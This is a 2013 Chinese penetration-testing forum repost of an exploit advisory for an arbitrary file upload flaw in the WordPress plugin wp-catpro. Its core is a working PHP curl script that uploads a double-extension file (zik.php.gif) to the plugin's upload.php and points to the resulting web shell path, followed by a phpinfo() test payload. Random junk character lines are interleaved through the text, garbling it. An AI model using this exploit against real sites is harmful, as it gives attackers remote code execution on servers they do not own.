中国网络渗透测试联盟
标题:
WordPress插件wp-catpro任意文件上传
[打印本页]
作者:
admin
时间:
2013-2-27 20:12
标题:
WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
) G9 ]! b# j) w% ?$ j
#-----------------------------------------------------------------------
5 ^/ M& }$ h4 Y
. w1 d- O. d/ Q5 ]# a
作者 => Zikou-16
+ O% O+ K1 S+ f4 C$ k4 [9 u
邮箱 =>
zikou16x@gmail.com
3 ]3 N+ ^' N3 V% ^
测试系统 : Windows 7 , Backtrack 5r3
! ] N5 v: e2 x1 f U+ o
下载地址 :
http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
) D/ d0 A$ y$ K5 z2 k' p9 t
####
& q* |0 \8 F/ j- }5 [7 ?$ J
6 _* |2 H3 I( {3 P ^' ?9 Y
#=> Exploit 信息:
( Q$ E4 L& Z2 o. l/ l, Z# a! G
------------------
" ^) b# c5 x8 ~
# 攻击者可以上传 file/shell.php.gif
# O& q" X6 I% I
# ("jpg", "gif", "png") // Allowed file extensions
f5 P1 [+ G% y. u1 E
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
/ F0 o' l4 G e' [' w! o4 B, \
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
0 f' [3 C- R1 Z% J; Q
------------------
3 l( N1 w& O$ s
' B1 m0 @' `: g6 X, {- e5 s
#=> Exploit
5 h1 C! [) n6 u
-----------
% q3 C) J: t+ ]
<?php
# j# k' @3 A) C6 O9 o2 ~
% h; G) u7 p/ \& O: ~* r; O
$uploadfile="zik.php.gif";
* X& a9 N1 j. a; v5 D8 H& W
$ch = curl_init("http://[
www.2cto.com
]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
; C: D7 m5 N3 \' o
curl_setopt($ch, CURLOPT_POST, true);
, o! _8 A! u: I' { p$ B: A
curl_setopt($ch, CURLOPT_POSTFIELDS,
$ F+ m! k" ]$ Y2 D
array('Filedata'=>"@$uploadfile",
V8 M6 K4 m, l; r7 ]7 I! o
'folder'=>'/wp-content/uploads/catpro/'));
) b1 X; p P, v/ f; R' W# H7 m
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
* v) G9 r8 M; x: S
$postResult = curl_exec($ch);
( k0 y* a+ h3 {! m- h. @
curl_close($ch);
5 {) p* @1 p+ H) p4 r4 b
; ~* q# i: `6 _, E
print "$postResult";
6 f' I) H3 o% ]: r4 w% f) O
; Z h: ?4 C: P; x
Shell Access : http://[
www.xxx.com
]/[path]/wp-content/uploads/catpro/random_name.php.gif
5 ?, m0 a( Y T' z% x
?>
8 N1 [7 Z' T( S8 n$ M
<?php
6 t& v4 e K1 G, J
phpinfo();
, b& g! t( M# s9 C5 ~# J( }" X
?>
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2